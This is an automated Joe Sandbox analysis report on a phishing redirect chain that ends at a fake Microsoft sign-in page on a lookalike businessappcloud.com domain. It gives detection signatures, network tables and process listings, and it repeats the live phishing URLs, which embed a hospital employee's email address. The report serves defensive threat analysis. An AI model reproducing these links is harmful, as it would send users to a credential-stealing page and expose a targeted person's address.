Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/safetyworksolutions.com%2Fpklxg%2F1769066015/ai5taWNoYWVsLm1hcnNoQG92ZXJsYWtlaG9zcGl0YWwub3Jn

Overview

General Information

Sample URL:https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/safetyworksolutions.com%2Fpklxg%2F
Analysis ID:1556693

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
AI detected suspicious URL
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid T&C link found
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 3928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1896,i,3068773618558549863,8127913458598152463,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6680 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/safetyworksolutions.com%2Fpklxg%2F1769066015/ai5taWNoYWVsLm1hcnNoQG92ZXJsYWtlaG9zcGl0YWwub3Jn" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.orgJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with domains like 'microsoft.com' or 'microsoftonline.com'., The provided URL 'loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com' contains the string 'microsoftonline', but it is embedded within a longer, suspicious domain name., The domain 'businessappcloud.com' does not match the legitimate domain associated with Microsoft services., The URL contains multiple concatenated words and unusual elements, which is a common tactic in phishing URLs to confuse users., The presence of a password input field on a suspicious domain increases the risk of phishing. DOM: 2.5.pages.csv
Source: EmailJoe Sandbox AI: AI detected Brand spoofing attempt in URL: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com
Source: EmailJoe Sandbox AI: AI detected Typosquatting in URL: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com
Source: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.orgHTTP Parser: Number of links: 0
Source: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.orgHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.orgHTTP Parser: Title: Sign in to your account does not match URL
Source: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.orgHTTP Parser: Invalid link: Privacy statement
Source: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.orgHTTP Parser: <input type="password" .../> found
Source: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.orgHTTP Parser: No favicon
Source: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.orgHTTP Parser: No favicon
Source: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.orgHTTP Parser: No favicon
Source: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.orgHTTP Parser: No favicon
Source: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.orgHTTP Parser: No <meta name="author".. found
Source: https://loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com/iUVji/?e=j.michael.marsh@overlakehospital.orgHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 2.19.85.159:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.19.85.159:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49767 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 1MB later: 30MB
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: safetyworksolutions.com
Source: global trafficDNS traffic detected: DNS query: loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: 6032451419-1323985617.cos.na-siliconvalley.myqcloud.com
Source: global trafficDNS traffic detected: DNS query: 6032451419.invocelaw.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownHTTPS traffic detected: 2.19.85.159:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.19.85.159:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49767 version: TLS 1.2
Source: classification engineClassification label: mal52.phis.win@21/22@42/257
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1896,i,3068773618558549863,8127913458598152463,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/safetyworksolutions.com%2Fpklxg%2F1769066015/ai5taWNoYWVsLm1hcnNoQG92ZXJsYWtlaG9zcGl0YWwub3Jn"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1896,i,3068773618558549863,8127913458598152463,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Extra Window Memory Injection
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/safetyworksolutions.com%2Fpklxg%2F1769066015/ai5taWNoYWVsLm1hcnNoQG92ZXJsYWtlaG9zcGl0YWwub3Jn0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
stackpath.bootstrapcdn.com
104.18.10.207
truefalse
    high
    loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.com
    162.159.140.160
    truetrue
      unknown
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        maxcdn.bootstrapcdn.com
        104.18.10.207
        truefalse
          high
          s-part-0017.t-0009.t-msedge.net
          13.107.246.45
          truefalse
            high
            6032451419.invocelaw.com
            162.241.71.126
            truefalse
              unknown
              safetyworksolutions.com
              162.241.87.113
              truefalse
                unknown
                code.jquery.com
                151.101.66.137
                truefalse
                  high
                  cdnjs.cloudflare.com
                  104.17.25.14
                  truefalse
                    high
                    cos.na-siliconvalley.myqcloud.com
                    170.106.97.198
                    truefalse
                      unknown
                      challenges.cloudflare.com
                      104.18.95.41
                      truefalse
                        high
                        sni1gl.wpc.omegacdn.net
                        152.199.21.175
                        truefalse
                          high
                          www.google.com
                          142.250.185.68
                          truefalse
                            high
                            6032451419-1323985617.cos.na-siliconvalley.myqcloud.com
                            unknown
                            unknownfalse
                              unknown
                              aadcdn.msftauth.net
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://safetyworksolutions.com/pklxg/1769066015/ai5taWNoYWVsLm1hcnNoQG92ZXJsYWtlaG9zcGl0YWwub3Jnfalse
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  104.18.10.207
                                  stackpath.bootstrapcdn.comUnited States
                                  13335CLOUDFLARENETUSfalse
                                  13.107.246.45
                                  s-part-0017.t-0009.t-msedge.netUnited States
                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                  172.217.18.14
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  104.18.94.41
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  216.58.206.35
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  151.101.130.137
                                  unknownUnited States
                                  54113FASTLYUSfalse
                                  151.101.66.137
                                  code.jquery.comUnited States
                                  54113FASTLYUSfalse
                                  170.106.97.198
                                  cos.na-siliconvalley.myqcloud.comSingapore
                                  132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                  35.190.80.1
                                  a.nel.cloudflare.comUnited States
                                  15169GOOGLEUSfalse
                                  162.241.71.126
                                  6032451419.invocelaw.comUnited States
                                  26337OIS1USfalse
                                  172.217.18.10
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  162.241.87.113
                                  safetyworksolutions.comUnited States
                                  46606UNIFIEDLAYER-AS-1USfalse
                                  142.250.185.67
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  142.250.185.68
                                  www.google.comUnited States
                                  15169GOOGLEUSfalse
                                  1.1.1.1
                                  unknownAustralia
                                  13335CLOUDFLARENETUSfalse
                                  172.217.16.206
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  104.18.95.41
                                  challenges.cloudflare.comUnited States
                                  13335CLOUDFLARENETUSfalse
                                  216.58.206.42
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  162.159.140.160
                                  loginmicrosoftonlinecommonoauthithelpdeskmfaexpirationz.businessappcloud.comUnited States
                                  13335CLOUDFLARENETUStrue
                                  104.18.11.207
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  239.255.255.250
                                  unknownReserved
                                  unknownunknownfalse
                                  152.199.21.175
                                  sni1gl.wpc.omegacdn.netUnited States
                                  15133EDGECASTUSfalse
                                  64.233.184.84
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  104.17.25.14
                                  cdnjs.cloudflare.comUnited States
                                  13335CLOUDFLARENETUSfalse
                                  142.250.184.234
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  IP
                                  192.168.2.16
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1556693
                                  Start date and time:2024-11-15 20:38:11 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                  Sample URL:https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/safetyworksolutions.com%2Fpklxg%2F1769066015/ai5taWNoYWVsLm1hcnNoQG92ZXJsYWtlaG9zcGl0YWwub3Jn
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:13
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • EGA enabled
